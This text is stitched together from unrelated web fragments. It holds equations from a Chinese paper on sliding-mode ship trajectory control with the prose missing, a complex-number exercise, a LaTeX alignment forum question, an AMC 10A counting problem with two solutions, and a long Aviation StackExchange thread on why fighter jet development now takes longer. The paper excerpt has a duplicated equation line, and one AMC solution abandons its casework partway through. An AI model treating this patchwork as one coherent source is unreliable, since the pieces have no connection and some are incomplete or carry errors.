$\left\{ \begin{array}{l} {{\dot z}_1} = {z_2} - {\beta _1}{\varepsilon _1}\text{,}\\ {{\dot z}_2} = {z_3} - {\beta _2}fal\left( {{\varepsilon _1},{\alpha _1},\delta } \right)+bu\text{,}\\ {{\dot z}_2} = - {\beta _3}fal\left( {{\varepsilon _1},{\alpha _2},\delta } \right)\text{。} \end{array} \right.$ (5)
2.2 反演滑模控制器的设计
${ M}{{ R}^{ - 1}}\left( \varphi \right)\ddot \eta+{ M}{\dot { R}^{ - 1}}\left( \varphi \right)\dot \eta+{ D}{{ R}^{ - 1}}\left( \varphi \right)\dot \eta = \tau+d\left( t \right)\text{,}$ (6)
$\ddot \eta = { A}\dot \eta+{ B}\left( {\tau+d\left( t \right)} \right)\text{,}$ (7)
${v^*} \!=\! { R}\left( \varphi \right)v \Rightarrow \dot \eta \!=\! {v^*}$,对式(1)进行简单调整:
$\left\{ \begin{array}{l} \dot \eta = {v^*}\text{,}\\ {{\dot v}^*} = { A}{v^*}+{ B}\left( {\tau+d\left( t \right)} \right)\text{。} \end{array} \right.$ (8)
1) 船舶轨迹跟踪误差为z1 =η-ηdηd 为船舶目标位置,则 ${\dot z_1} = {v^*} - {\dot \eta _d}$
${V_1} = \frac{1}{2}z_1^2\text{,}$ (9)
${\dot V_1} = {z_1}{\dot z_1} = {z_1}{z_2} - {c_1}z_1^2\text{,}$ (10)
$\sigma = {k_1}{z_1}+{z_2}\text{。}$ (11)
$\sigma \!=\! {k_1}{z_1} \!+\! {z_2} \!=\! {k_1}{z_1} \!+\! {\dot z_1}+{c_1}{z_1} = \left( {{k_1}+{c_1}} \right){z_1}+{\dot z_1}\text{。}$ (12)
2) 定义 Lyapunov 函数:
${V_2} = {V_1}+\frac{1}{2}{\sigma ^2}\text{,}$ (13)
$\begin{split}\\[-12pt] {{\dot V}_2} = & {{\dot V}_1}+\sigma \dot \sigma = {z_1}{z_2} - {c_1}z_1^2+\sigma \dot \sigma = \\ & {z_1}{z_2} - {c_1}z_1^2+\sigma \left( {{k_1}{{\dot z}_1}+{{\dot z}_2}} \right) = \\ & {z_1}{z_2} \!-\! {c_1}z_1^2 \!+\! \sigma \left( {{k_1}\left( {{z_2} \!-\! {c_1}{z_1}} \right) \!+\! {v^*} \!-\! {{\ddot \eta }_d} \!+\! {c_1}{{\dot z}_1}} \right) = \\ & {z_1}{z_2}\! - \!{c_1}z_1^2 \!+\! \sigma \left( {{k_1}\left( {{z_2} \!-\! {c_1}{z_1}} \right) \!+\! A\left( {{z_2} \!+\! {{\dot \eta }_d} \!-\! {c_1}{z_1}} \right)} +\right.\\ & \left. { Bu+F - {{\ddot \eta }_d}+{c_1}{{\dot z}_1}} \right)\text{。} \end{split}$ (14)
$\begin{split}\\[-12pt] u = & {{ B}^{ - 1}}\left( { - {k_1}\left( {{z_2} - {c_1}{z_1}} \right) - A\left( {{z_2}+{{\dot \eta }_d} - {c_1}{z_1}} \right) - } \right.\\ & \left. {\bar F{\mathop{\rm sgn}} \left( \sigma \right)+{{\ddot \eta }_d} - {c_1}{{\dot z}_1} - h\left( {\sigma+\beta {\mathop{\rm sgn}} \left( \sigma \right)} \right)} \right)\text{。} \end{split}$ (15)
3 系统稳定性分析
$\begin{split}\\[-12pt] {{\dot V}_2} = & {z_1}{z_2} - {c_1}z_1^2 - h{\sigma ^2} - h\beta \left| \sigma \right|+F\sigma - \\ & \bar F\left| \sigma \right| \leqslant - {c_1}z_1^2+{z_1}{z_2} - h{\sigma ^2} - h\beta \left| \sigma \right|\text{,} \end{split}$ (16)
${ Q} = \left[ {\begin{array}{*{20}{c}} {{c_1}+hk_1^2} & {h{k_1} - \frac{1}{2}}\\ {h{k_1} - \frac{1}{2}} & h \end{array}} \right]\text{,}$ (17)
$\begin{split}\\[-12pt] {z^{\rm T}}{ Q}z = & \left[ \!\!\!{\begin{array}{*{20}{c}} {{z_1}} & {{z_2}} \end{array}}\!\! \right]\left[ \!\!{\begin{array}{*{20}{c}} {{c_1}+hk_1^2} & {h{k_1} - \frac{1}{2}}\\ {h{k_1} - \frac{1}{2}} & h \end{array}} \!\! \right]{\left[ \!\!{\begin{array}{*{20}{c}} {{z_1}} & {{z_2}} \end{array}}\!\! \right]^{\bf T}}= \\ & {\rm{ }} {c_1}z_1^2 - {z_1}{z_2}+hk_1^2z_1^2+2h{k_1}{z_1}{z_2}+hz_2^2 =\\ & {\rm{ }} {c_1}z_1^2 - {z_1}{z_2}+h{\sigma ^2}\text{,} \end{split}$ (18)
${\dot V_2} \leqslant - {z^{\bf T}}{ Q}z - h\beta \left| \sigma \right| \leqslant 0 \text{,}$ (19)
$\left| { Q} \right| = h\left( {{c_1}+hk_1^2} \right) - {\left( {h{k_1} - \frac{1}{2}} \right)^2} = h\left( {{c_1}+{k_1}} \right) - \frac{1}{4}\text{。}$ (20)
4 仿真研究及结果
$\begin{array}{l} { M} = \left[ {\begin{array}{*{20}{c}} {0.9270} & 0 & 0\\ 0 & {1.7502} & { - 0.1754}\\ 0 & { - 0.1754} & {0.1578} \end{array}} \right] \text{,}\\ { D} = \left[ {\begin{array}{*{20}{c}} {0.0558} & 0 & 0\\ 0 & {0.1183} & { - 0.0402}\\ 0 & { - 0.0151} & {0.0506} \end{array}} \right]\text{。} \end{array}$
图 2 船舶纵荡位置输出 Fig. 2 Output of the ship longitudinal swing position
图 3 船舶横荡位置输出 Fig. 3 Output of ship swing position
图 4 船舶艏摇角度输出 Fig. 4 Output of ship yaw angle
图 5 船舶运动轨迹 Fig. 5 The track of the ship motion
图 6 船舶控制力、力矩 Fig. 6 Ship control force and control torque
图 7 船舶外界扰动力观测值 Fig. 7 Observation values of external disturbance
5 结语
[1] 徐瑞萍, 高存臣. 基于线性反馈控制的一类混沌系统的同步[J]. 中国海洋大学学报(自然科学版), 2014 (5): 17. XU Rui-ping, GAO Cun-chen. Synchronization of a class of chaotic systems based on linear feedback control[J]. Journal of Ocean University of China (natural science edition), 2014 (5): 17. [2] 李洪兴, 苗志宏, 王加银. 非线性系统的变论域稳定自适应模糊控制[J]. 中国科学(E辑), 2002, 32 (2): 211–223. LI Hong-xing, MIAO Zhi-hong, WANG Jia-yin. Stability and adaptive fuzzy control of nonlinear systems with variable universe adaptive fuzzy control[J]. China Science (E), 2002, 32 (2): 211–223. [3] 刘金琨, 孙富春. 滑模变结构控制理论及其算法研究与进展[J]. 控制理论与应用, 2007, 24 (3): 407–418. LIU Jin-kun, SUN Fu-chun. Research and application of sliding mode variable structure control theory and its algorithm research and development[J]. Control Theory and Application, 2007, 24 (3): 407–418. [4] 达飞鹏, 宋文忠. 基于模糊神经网络滑模控制器的一类非线性系统自适应控制[J]. 中国电机工程学报, 2002, 22 (5): 78–83. DA Fei-peng, SONG Wen-zhong. Based on the fuzzy neural network sliding mode controller for a class of nonlinear system adaptive control[J]. Proceedings of the CSEE, 2002, 22 (5): 78–83. [5] 高峰. 船舶动力定位自抗扰控制及仿真的研究[D]. 大连:大连海事大学, 2013. [6] 贾欣乐, 杨盐生. 船舶运动数学模型[M]. 大连: 大连海事出版社, 1999. [7] 边信黔, 付明玉, 王元慧. 船舶动力定位[M]. 北京: 科学出版社, 2011. [8] CHEN Q, YU L, NAN Y R. 2013 J. Syst. Sci. Complex. 26940. [9] 刘金棍. 滑模变结构控制Matlab仿真[M]. 北京: 清华大学出版社, 2005.
|
|
• mathslover
If $$z_1$$ and $$z_2$$ are two complex numbers such that $$|\frac{z_1 - z_2}{z_1 + z_2}| =1$$ , prove that, $$\frac{iz_1}{z_2}=k$$ is a real number. Find the angle between the lines from the origin to the points $$z_1 + z_2$$ and $$z_1 - z_2$$ in terms of k.
Mathematics
Looking for something else?
Not the answer you are looking for? Search for more explanations.
|
|
Multiple alignment points in LaTeX
1. Feb 16, 2012
Fredrik
Staff Emeritus
If I have two strings of equalities within the same align or alignat environment, and the first one is long enough to need two lines, I would want the result to look like
Code (Text):
A+B+C=D=E
=F=G=H
I=J
rather than
Code (Text):
A+B+C=D=E
=F=G=H
I=J
Is there a way to do this? I suppose it can be done with an array, but I thought either align or alignat would be able to handle this. I get garbage results like these:
\begin{alignat}{3}
&F_k &=(f\chi_E)^{-1}(v_k)=\{x\in X|f(x)\chi_E(x)=v_k\}=\{x\in X|f(x)=v_k\}\cap E\\
&&=f^{-1}(v_k)\cap E=E_k\cap E\in\Sigma,\\
&\mu\big(F_k)=\mu(E_k\cap E)\leq\mu(E_k)<\infty.
\end{alignat}
\begin{alignat}{4}
&F_k && =(f\chi_E)^{-1}(v_k) =\{x\in X|f(x)\chi_E(x)=v_k\}=\{x\in X|f(x)=v_k\}\cap E\\
&&&=f^{-1}(v_k)\cap E=E_k\cap E\in\Sigma,\\
&\mu\big(F_k)=\mu(E_k\cap E)\leq\mu(E_k)<\infty.
\end{alignat}
|
|
# Difference between revisions of "2006 AMC 10A Problems/Problem 21"
## Problem
How many four-digit positive integers have at least one digit that is a $2$ or a $3$?
$\textbf{(A) } 2439\qquad\textbf{(B) } 4096\qquad\textbf{(C) } 4903\qquad\textbf{(D) } 4904\qquad\textbf{(E) } 5416$
~ pi_is_3.14
## Solution 1 (Complementary Counting)
Since we are asked for the number of positive $4$-digit integers with at least $2$ or $3$ in it, we can find this by finding the total number of $4$-digit integers and subtracting off those which do not have any $2$s or $3$s as digits.
The total number of $4$-digit integers is $9 \cdot 10 \cdot 10 \cdot 10 = 9000$, since we have $10$ choices for each digit except the first (which can't be $0$).
Similarly, the total number of $4$-digit integers without any $2$ or $3$ is $7 \cdot 8 \cdot 8 \cdot 8 ={3584}$.
Therefore, the total number of positive $4$-digit integers that have at least one $2$ or $3$ is $9000-3584=\boxed{\textbf{(E) }5416}.$
## Solution 2 (Casework)
We proceed to every case.
Case $1$: There is ONLY one $2$ or $3$. If the $2$ or $3$ is occupying the first digit, we have $512$ arrangements. If the $2$ or $3$ is not occupying the first digit, there are $7 \cdot 8^2$ = $448$ arrangements. Therefore, we have $2(448 \cdot 3 + 512) = 3712$ arrangements.
Case $2$ : There are two $2$s OR two $3$s. If the $2$ or $3$ is occupying the first digit, we have $64$ arrangements. If the $2$ or $3$ is not occupying the first digit, there are $56$ arrangements. There are $3$ ways for the $2$ or the $3$ to be occupying the first digit and $3$ ways for the first digit to be unoccupied. There are $2(3 \cdot (56+64))$ = $720$ arrangements.
Case $3$ : There is ONLY one $2$ and one $3$. If the $2$ or the $3$ is occupying the first digit, we have $6$ types of arrangements of where the $2$ or $3$ is. We also have $64$ different arrangements for the non-$2$ or $3$ digits. We have $6 \cdot 64$ = $384$ arrangements. If the $2$ or the $3$ isn't occupying the first digit, we have $6$ types of arrangements of where the $2$ or $3$ is. We also have $56$ different arrangements for the non-$2$ or $3$ digits. We have $6 \cdot 56$ = $336$ arrangements for this case. We have $336 + 384$ = $720$ total arrangements for this case.
Notice that we already counted $3712 + 720 + 720 = 5152$ cases and we still have a lot of cases left over to count. This is already larger than the second largest answer choice, and therefore, our answer is $\boxed{\textbf{(E) }5416}$.
~Arcticturn
|
|
# Why does it take so long to develop modern military jets?
In the 1960's, it took three years to produce a flying prototype of an aircraft that flew faster than anything before, was built out of a novel construction material, used a new type of fuel, and was incredibly advanced: the Lockheed A-12. Its successor the SR-71 was the first aircraft with stealth technology applied, and stayed in service for decades.
From the Wikipedia page of the A-12:
• March 1959: a pre-design drawing differing from the final configuration
• 26 January 1960: order of 12 A-12 aircraft
• 25 April 1962: first flight of the prototype.
The F-35 program is a modern day jet platform program. It took 5 years to develop and build a winning prototype, and then 5 years for first flight of a production machine. It has been in the news for years for delays and cost overruns - latest problem is with the oxygen system.
From its Wikipedia:
• The JSF development contract was signed on 16 November 1996,
• 26 October 2001 to Lockheed Martin, whose X-35 beat X-32
• 15 December 2006 F-35 first flight
• In 2012, General Norton A. Schwartz decried the "foolishness" of reliance on computer models to arrive at the final design of aircraft before flight testing has found the problems that require changes in design.
So to the uninitiated, it seems like half a century ago, the awesomest plane on earth could be delivered for service three years after finalising design. The successor SR-71 was developed in 2 years, had the addition of the side chimes for reducing radar cross-section, and was so much ahead of its time that it could stay in service for decades. Now, it takes 10 years from contract sign to first flight of a production machine that remains experiencing design problems until the present day, and then a further 10 years to debug all problems.
The A-12 engineers faced very complicated problems as well, yet they could solve them in record time. What am I missing? Why does development take so much longer?
Edit
How about this one:
• in 1972, the Air Staff selected General Dynamics' Model 401 and Northrop's P-600 for the follow-on prototype development and testing phase.
• The first YF-16 was rolled out on 13 December 1973, and its 90-minute maiden flight was made at the Air Force Flight Test Center (AFFTC) at Edwards AFB, California, on 2 February 1974.
Update: the answer. -- Updated update: more would make the question too long, I've added an answer.
Multiple very good answers list the following:
• Fewer types expected to take on more roles
• Lack of competition
• No urgency imposed by war
• Therefore, no work force experienced in rapid solving of extremely complicated problems
• Peace-time politics having to justify budget decisions to the voters.
• Better testing and greater safety imposing more time demands.
All are very good points. The light attack aircraft with short development time is illustrative, as is this article in The Economist.
I still have great difficulty in accepting that:
• A reason would be the complexity of the problem, which is very often quoted. All aerospace problems are extremely complex, that is nothing new. But now nobody can tackle them anymore? That was the basis of my question.
• Having fewer airframe types saves cost and/or development time, this seems evidently incorrect. Pointed out in @Hephaestus Aetnaean's answer
• It should cost twenty years to properly develop an aircraft. Upgrades during the life cycle, sure. On the number of lines of code as reason, here is some perspective. 8 Million Lines Of Code (MLOC) compares with Firefox and the Chevy Volt, 24 MLOC with Apache Open Office.
Update 2
Additional points are made below - by writing in big black letters. Not sure if that makes the point more valid.
Cost-wise, the F-35 indeed beats Augustine's law XVI. The article in The Economist from 2010 referenced above has the predicted F-35 in the plot, according to @Hephaestus Aetnaean the cost is even lower, just below the $10^8$ dollar line:
So the year in which all of the US defence budget can buy only one aircraft may be postponed from predicted 2054 to maybe 2074?
Development time wise (which is what the question is about), it is pointed out that F-35 development time is 2.5 times F-16 time. That is a big leap in a bit over two decades. Yes development time of European jets is long as well, perhaps due to smaller defence budget of smaller countries? Ironic that they are setting the standard in this.
Long software development time - has software engineering not developed methods to tackle large complicated problems? Especially where the problem - and solutions - increase incrementally? Does better testing and off-line simulation not allow for decoupling off of the project critical path, and therefore save time instead of requiring more? I opened up a question on Stack Exchange Software Engineering, and they mention that FireFox has 20 millon lines of code.
I don't want to knock the F-35, it's indeed an awesome platform. If it ends up a capable platform for a reasonable price, that is great and I wish all the best to pilots carrying out their mission in service of their country. And perhaps the long development time and multiple news items remain only a memory.
Update 3
Too long to include in a question edit, refer to my answer below.
• @EricUrban we also have an aviation-history tag. – Federico Jun 11 '17 at 14:27
• I think the SR-71 was not so much "ahead of its time" as that it was good enough at the limited set of jobs it did that there was no need for a replacement. Though one could argue that it has mostly been replaced by something entirely different: satellites. – jamesqf Jun 11 '17 at 18:03
• This question is interesting because the same seems true of almost ALL technology these days - while model lifecycles and scaling are fast, innovation is not... – rackandboneman Jun 11 '17 at 19:47
• Your timeline is a little short for the SR-71. Preliminary work on the A-12 (precursor to the SR-71) began in 1957. – reirab Jun 12 '17 at 0:44
• I think a big part of the answer is that the looming threat of nuclear annihilation makes a good motivating factor. Note that the aircraft you reference was developed as a spy plane, to carry out recon over the USSR. – aroth Jun 12 '17 at 8:44
## 13 Answers
First of all, it took at least five years even back then, but your observation is absolutely correct. You would need to go back one more decade to find a frontline fighter that was designed within two years.
The reasons are:
• Urgency: Back then, the Cold War arms race forced both sides to continuously improve. Together with the advances in weapons and tactics, this meant that upgrading older airframes did not suffice.
• A trained workforce: Experienced engineers back then had worked on a dozen new designs (or more), so they had developed a gut feeling how to design the next one. Today, one can be lucky to have brought a single one into the air within a lifetime.
• Complexity: As aircraft become ever more expensive, their specs are mulled over for years. The time it takes to write today's specs is reflected in the sometimes contradicting demands put on a new design. Every new design has to be a Jack of all trades which will increase development time. A lot.
• Culture: Today's culture is very risk-averse. Contrast that to the Fifties, when the F-100 went supersonic on its second test flight and went on to be involved into 889 accidents, causing the death of 324 pilots over its operational career. Design and testing was much less thorough, leaving more complicated effects like flutter or fatigue to chance and accepting others like dangerous stall characteristics. Today, we evaluate and test much more because we can and try to avoid mishaps at almost all cost. That takes time.
I can't stress the importance of the second point enough. When the first aerodynamic dataset for the TKF-90 was sent to the simulation guys at MBB, it was rejected because the coefficients were obviously "wrong". As it turned out, the guy in simulation had spent his entire career with Tornado data, so this was all he knew. In my time, I tried to lobby for a cheap design just to keep people trained, but got nowhere with the beancounters running the company. For them, every engineer was the same. In their eyes, experience can be judged by an engineer's degree and company-funded training is a waste of money. See, the training issue goes all the way up to the top! If even the bosses have little idea what it takes to design a good aircraft quickly, you get what we have today.
Note that complexity not only concerns the airframe. Modern programs are mostly multinational and spread over as many constituencies as possible. The amount of coordination of such an artificially increased workforce is immense. Also, testing all states of a complex airframe takes much more time and risk management means that quick trials are impossible. Back then, the strategy was mostly trial and error, whereas today every program is tested to death to avoid any failure.
Have you ever read Augustine's Laws? This is a great book with a lot of profound insights into the military aviation business. And when even the CEO of Lockheed cannot make a dent in the system even though he has demonstrated a deep understanding of its faults, you know how little can be changed.
Because you used the SR-71 as an example: This combines all points in the extreme.
• After the U-2 incident and without working satellites, urgency was extreme. People worked almost around the clock to get the new design into operation. Contrast this with today where a flight test is postponed for the slightest risk. Delays? Who cares!
• Kelly Johnson hand-picked the best engineers from the Burbank offices and had been working on Mach 3 designs for almost a decade before. Also, the most time-consuming detail of the Blackbird family of aircraft, their engine, was ready when he started. I remember from Ben Rich's autobiography that Kelly could predict the heat load of a shockwave with only a few degrees of error just by guessing back then. To develop this kind of experience takes a lot of wind tunnel data! And he had almost complete liberty to decide how to proceed. No beancounter dared to second-guess his decisions - performance was still more important than profits. Compare that with today …
• The Blackbird family of aircraft was meant to do one thing only. Fly fast. No demands on turn rate, field length or a wide variety of external loads. Also no dozens of mission profiles, high and low, loiter and penetration, air superiority and bombing with one platform. That helped to get it out the door quickly.
That the Blackbird family was not replaced by something better was caused by … wait for it … the ever increasing cost of new designs. It simply was the last in a long line.
• I like Augustine Law XII. So the answer might be that the guys with the brilliant solutions are not there anymore? – Koyovis Jun 12 '17 at 1:43
• @Koyovis: This might indeed be a factor. The best minds are attracted by the most complex problems and hate being held back by dumber people of higher rank. Today's aviation industry is close to the perfect place to repel them. – Peter Kämpf Jun 12 '17 at 5:27
• Your comment about "every engineer was the same" is so so true in contracting. I was part of a team where management thought little of getting rid of experienced engineers at the drop of a hat just because next month's budget was slightly lower. Eventually it was my turn as a budget victim, and I knew that a few months later they would be on the market again, crying of the tech "skills gap", wondering what happened to all the skilled engineers. Of course, being a former employee was a black mark against you. We weren't even working on jets - we were doing logistics systems. – Robert Columbia Jun 12 '17 at 15:06
• @RobertColumbia: And it works, in their eyes! I witnessed a program with a problem which required expert advice, but the recommended expert was too expensive, so just some engineer was hired. He failed. Five more were hired and failed, too. Ten more were hired and by chance, one of them realized what the problem was. Management congratulated themselves how successfully they had solved the problem. That they could had achieved the same at a small fraction of the time and expense never occurred to them. – Peter Kämpf Jun 12 '17 at 16:21
• Would also have to add what no one has said: there's a hell of a lot more money in project delays than there used to be. This has been covered in a lot of places but the film Why We Fight is as good a source as any. – Dave Kanter Jun 12 '17 at 18:18
There are quite a few reasons for this- technically speaking, the primary one is that the system complexity has increased tremendously. More systems mean more interfaces, more redundancies, meaning more chances of failure and more troubleshooting. The modern combat aircraft is expected to perform a wide variety of missions, which would've been performed by different aircraft in the past.
Modern combat aircraft are multirole (or omnirole, if you go by the French), expected to perform more things and better than their predecessors and last longer. Consider the case of the F-35. The aircraft is expected to perform roles performed by a variety of aircraft (F-16, A-10 and F/A-18) in different services. Compared to this, the primary mission of the SR-71 was simple- go fast undetected (fast being the primary one).
Added to this, the aircraft is expected to have systems integrated into it to enable it to be operated well into the future. Electronic systems are still a work in progress and its development costs are significant, easily eclipsing the cost involved in the development of airframe. In fact, the electronic system will be development long after the airframe is finalized, resulting in R&D costs right until the aircraft is fielded (and well after that) as the customer wants to cram as much systems as possible into the airframe.
The image below shows the type and number of combat aircraft in USAF service since the 1950s.
Aircraft in USAF service; image from math.andyou.com
This clearly shows the issue- fewer modern aircraft are expected to perform better than their more numerous predecessors and it is only expected to become more severe.
There is another thing that is not obvious from the graph- the number of suppliers available. For example, in 1960, you have the F-86 Sabre made by North American, F-84 Thunderjet made by the Republic Aviation, the F-89 Scorpion made by Northrop and F-106 Delta Dart made by Convair, and this is only a partial list. Today, if the USAF wants to buy a fighter, they got Lockheed (and Boeing by a thread) and nobody else. There is no competition here.
As the selection pool decreases, it becomes more difficult for the buyer to enforce any fiscal discipline, especially when the contract is cost plus. Another thing is that the tendency to take risk goes down- no one wants the next one to go under by making a mistake when the costs outweigh the benefits. You have this situation where the last guy standing is sure that the government is going to fund him as much and as long no matter what the cost overruns are- simply because there is no plan 'B'.
There is another facet to this- if the development contracts are not continuous i.e. back to back, the knowledge of development of the systems have to be re-learned every time, resulting in more delays. It is easier to build on available knowledge base rather than learning something new. The people who worked on SR-71, for example, had already worked on A-12 Cygnus. Skills that are not updated continuously will perish easily, especially in aerospace, where the talent pool is rather small. So, don't be surprised if the next aircraft take more time and money to develop.
• The A-12 Cygnus looks a lot like the SR-71 and was capable of high altitude flight (90,000 feet) at top speeds of over mach 3. You could almost argue the SR-71 was a refinement. – David Schwartz Jun 11 '17 at 18:34
• So to paraphrase, the F35 is a multifunction fax-printer-scanner-toaster-wafflemaker where historically up to five different aircraft might have been used for one purpose each. – Criggie Jun 11 '17 at 20:10
• I'm skeptical to believe that complexity is the main factor given that the SR71 was designed with drafting machines and the titanium to build it had to secretly be acquired from the USSR. – The Thrifty Engineer Jun 11 '17 at 23:12
• @Koyovis They had hard math problems, with elegant engineering solutions. The F-35 is a significantly more complex problem with far more (literally!) moving parts to worry about. The extended state of a system increases exponentially as you add more features and that is a big challenge for engineering. – Gusdor Jun 12 '17 at 13:03
• I don't really buy this, look at the Saab Gripen's development cycle. The difference while they made mistakes, they couldn't afford to be wasteful on the same scale as the F35 program. I don't think the USA is a good example at all actually. We should be looking at arms industries that aren't so heavily politicized and propped up by their government. – Nathan Cooper Jun 13 '17 at 11:05
UPDATE:
I want to clarify/emphasize a few things in my answer.
## #1: Ultimately, the core driver of development time is growing complexity.
More advanced threats means more advanced systems, which usually means more complexity.
• Your opponent gets a bigger radar, so you need a bigger one to see him first. You add jammers to shorten his effective radar detection range; he switches to IR sensors to augment his radar; you have to reduce your IR signature (buried/insulated engines, serrated nozzles).
• He coordinates with ground controllers and their huge radars; you jam his comms; he adds anti-jam functionality to his comms; you coordinate with AWACS to extend your own detection range and add standardized comms so everyone can talk to each other.
• You go low to hide your radar signature in ground clutter; he adds Doppler filtering.
• He gets IR missiles; you get IR jammers; he gets jam-resistant IR seekers; you get lasers to burn his seekers.
• You build a more maneuverable fighter; he gets super-maneuverable dogfighting missiles that can lock on at extreme angles.
These advanced capabilities aren't optional. They're necessary for survival. Even more capability is required to actually execute a mission.
• No missile approach and warning system? You might never see the missile coming.
• No radar jammers, no laser IR jammers, no decoys? Then his missiles are more likely to hit.
• No low probability of intercept functionality (radar and comms)? Then he could detect you from long range (rendering your stealth less useful) or jam your radar.
• No ground-mapping modes? Then you have to spend more time in hostile air space looking for a target. Or you have to rely on someone else to find targets for you (now you need two aircraft).
• No integrated ground targeting pod? Then you need an external pod, which is draggier and increases you RCS.
• No stealth? No jamming? Have fun starring at long range radars and SAMs.
• No jam-resistant comms? Have fun talking to yourself.
## #2: So why not design everything incrementally?
Why not fly a quick n' dirty design, find the problems, and then fix it in the next block?
First, we still do that (to a degree). The F-22, F-35, and B-21 all have upgrade paths.
Second, that can be more expensive and time consuming that designing everything at once.
• A \$1 flaw in design costs a \$10 in production and \$100 in the field. When aircraft are already so expensive, the flaws will also be expensive to fix. • When aircraft are so complex, purely serial design/development would take forever. • Low-rate production is inefficient/costly. Stopping production between blocks is even more costly. But designing everything simultaneously is more complex (more balls to juggle). So there's a balance between serial and concurrent development. ## #3: Development time is counted differently Better testing and greater safety imposing more time demands. - [from the updated question] It's not only that modern testing is more stringent/complete/safe, but that modern development time is counted differently. • F-16 development time is longer than it appears because the F-16 essentially entered service before testing was complete. (Remember how the tail had to be enlarged by 25% to address deep stall? That fix didn't happen until Block 15, after 329 airframes were already built.) By modern standards, the early F-16s would still be in testing. • And USAF dissatisfaction with the F-16's (and F-15's) engine led to a bitter dispute with PW, leading to the alternate engine program. Eventually, GE engines power most F-16s today. • The F-14 is also imfamous for its bomber-derived engines, which performed poorly at high AOA. So it's not just about safety, but also basic functionality. In comparison, there's a couple hundred F-35s around today (~300, ~210 in the field, ~90 coming out of production), more than the F-15C/D (~180), F-22 (~180), or F-15E (220+) fleets. (Some are already in service with the US Air Force and US Marine Corps, others are wrapping up testing, and still others are stateside training the initial cadre of pilots for various partner nations.) While most of them aren't in service, they're already at a more "advanced" state of testing than the F-16 was after it had already entered service. Of course, besides safety and thoroughness, more testing/development is necessary because more complex aircraft have more things to test/develop. ## 4: Multiroles can save money and can provide more capability I still have great difficulty in accepting that... Having fewer airframe types saves cost and/or development time, this seems evidently incorrect. - [from the updated question] First, if two aircraft are similar enough, you might use the same aircraft to serve both roles. You develop one aircraft instead of two, theoretically cutting your development costs in half. Or you can use those savings to design a better plane. In practice, you might need to make some mods to suit different roles/customers, but the airframe and systems are [hopefully] similar enough to yield net savings (or a better aircraft). This isn't unprecedented. The YF-16 and YF-17 both fought for the same US Air Force program, but the USAF took the F-16 and the Navy developed the YF-17 into the F-18. Second, the F-16 already does this. It already performs a variety of roles previously flown by several different types of aircraft. It's used for everything from close air support, interdiction/deep air support, and suppression of enemy air defenses, to air superiority and recon. The Super Hornet is also a potent multirole platform. Even the F-15E Strike Eagle, built for long range interdiction, has basically the same air superiority capability as the F-15C. Even the F-14 earned its "Bombcat" moniker. In fact, most modern and [surviving] legacy fighters are multirole: F-15, F-16, F-18, F-22, F-35, Su-27 family, Gripen NG, Rafale, Typhoon, J-10, J-20, etc. Multiroles are flexible and increase total available capability. Example: • Say Plane A (air superiority) does "100" air superiority and 0 ground attack. • Say Plane G (ground attack) does 0 air superiority and 100 ground attack. • Say Plane M (multirole) does 75 air superiority and 75 ground attack. • Say you buy 100 planes. You have two options: . | Option 1 | Option 2 | single-role | multirole --------------------------|-------------|----------- number of Plane A (100/0) | 50 | 0 number of Plane G (0/100) | 50 | 0 number of Plane M (75/75) | 0 | 100 air sup. capability | 5000 | 7500 ground. capability | 5000 | 7500 The multirole Plane M may not be as good as A or G in any specific role, but you get more capability overall. But if you build multiroles, you potentially have 100 planes available for each role. This works because missions change. On Day 1 you might need a lot of air superiority, and on Day 2 you might need a lot of ground-attack. Well, with only single-role fighters (option 1), half your fleet is useless on both days. But with multiroles (option 2), all of them are useful on both days. (Missions can even change on the same sortie, eg an interdiction group defends itself against opposing fighters before proceeding to their target. F-16 strike fighters that can defend themselves can be more efficient than always assigning "just in case" F-15 escorts.) This is even more true if you have more roles. If you have 10 different roles, you can only build 10 planes (average) for each role (in the single-role option). So up to 90% of your fleet might be useless on a particular day. (This is obviously an extreme example.) But even at the least-optimal point (max A, and max G), the multiroles still provide good capability (7500) compared to the single-roles (10,000). The single-roles' capability will vary between 5,000 and 10,000 (depending on day), whereas the multiroles can always bring 7,500. There's an exception. If you know beforehand you always need "5000" worth of air superiority, then yes, it's more efficient to build 50 air superiority fighters. But A) it's hard to know that beforehand (predicting the future), and B) that number will change over time regardless. But if you know you'll always need at least "1000" air superiority, then it's more efficient to buy 10 air superiority fighters (actually more than 10, depending on expected use). In practice, you'd build at least 10 air superiority fighters and give then some multirole functionality. (There's another exception. This model assumes all Air Superiority or Air to Ground capability is identical, regardless of source/type. Obviously this isn't always true.) Notice the break-even point in the example above. Plane M was 75/75, but if it was less capable (50/50), then Option 1 and 2 both offer the same available capabilities. So the multirole plane must be competent in its typical roles, otherwise the fleet composition is inefficient. On the other hand, the multirole plane doesn't have to excel at its typical roles, it just needs to be competent. Thankfully, multirole fighters can perform a variety of roles very well just by swapping payloads. Take the F-16 for example. Need defensive counter air? Load up the AMRAAMs. Need CAS? Grab nav/targeting pods and load some JDAMs/LGBs. Recce? Photo-recon pod. SEAD? HARMs, decoys, and jammers. Anti-armor? Mavericks and SDBs. Antiship? Harpoons. Don't forget the fuel. Recall how missions can change mid-flight. Those self-escorting F-16s are performing both roles simultaneously, say 25/75, so their total capability being used is 100, and fleet capability is 10,000 (equal to the single-roles on their best day or 2x the single-roles on their worst day). The F-35 can perform multiple roles simultaneously. They can escort themselves, find targets themselves, strike a ground target, jam enemy aircraft and ground radars, and even take out enemy SAMS, all the while acting like mini-AWACS/JSTARS for friendlies. Say that's 75/75/75/75/75/75, or 450 total per aircraft and 45,000 for the fleet. That's part of the value of multirole stealth fighters. They need far less support. (Image source: Beyond the "Bomber": The New Long-Range Sensor-Shooter Aircraft and United States National Security - Lieutenant General David A. Deptula, USAF (Ret.), 2015.) That's partly why you see the F-35 winning 20 vs. 8 fights and racking up >20:1 kill ratios at Red Flag: ## #5: [Multirole example] The F-35 [This section really deserves its own question/answer, but I'll abbreviate it here.] Cost The F-35A (\$94.6 million (FY16\$)) costs less than the Typhoon, Rafale, Gripen NG, and Super Hornet. In 2019, it'll cost a touch more (\$80 million) than a Block 50 F-16 (\$65-\$80 million).
Capability
